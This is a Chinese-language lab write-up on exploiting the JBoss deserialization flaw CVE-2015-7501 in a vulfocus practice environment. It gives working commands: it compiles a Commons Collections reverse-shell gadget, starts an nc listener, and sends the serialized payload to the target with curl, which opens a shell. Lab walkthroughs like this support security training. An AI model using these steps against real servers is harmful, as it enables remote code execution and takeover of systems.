JBOSS反序列化漏洞
環境: vulfocus jboss CVE-2015-7501
雲服務器
kali攻擊機
基本原理:JBoss在/invoker/JMXInvokerServlet請求中讀取了用戶傳入的對象,可以通過Apache Commons Collections中的Gadget執行任意代碼
訪問網站頁面
invoker/JMXInvokerServlet 頁面如果出現這個頁面,則證明存在漏洞
下載完成后在kali上解壓
進入到文件夾目錄
這里kali沒有帶javac命令,需要自己下載相關配置
使用命令安裝jdk
apt install default-jdk
然后執行命令
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
執行完成后再執行另一條命令
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
完成后生成一個ReverseShellCommonsCollectionsHashMap.ser文件,注意這里的ip和端口就是反彈到服務器的ip和監聽的端口
然后在服務器上使用nc開啟監聽
nc -lvnp port
這里服務器的ip和監聽的的端口就是上文的ip和端口
然后在kali執行命令進行反彈shell
curl http://vulfocus.fofa.so:60494/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
查看服務器,反彈shell成功
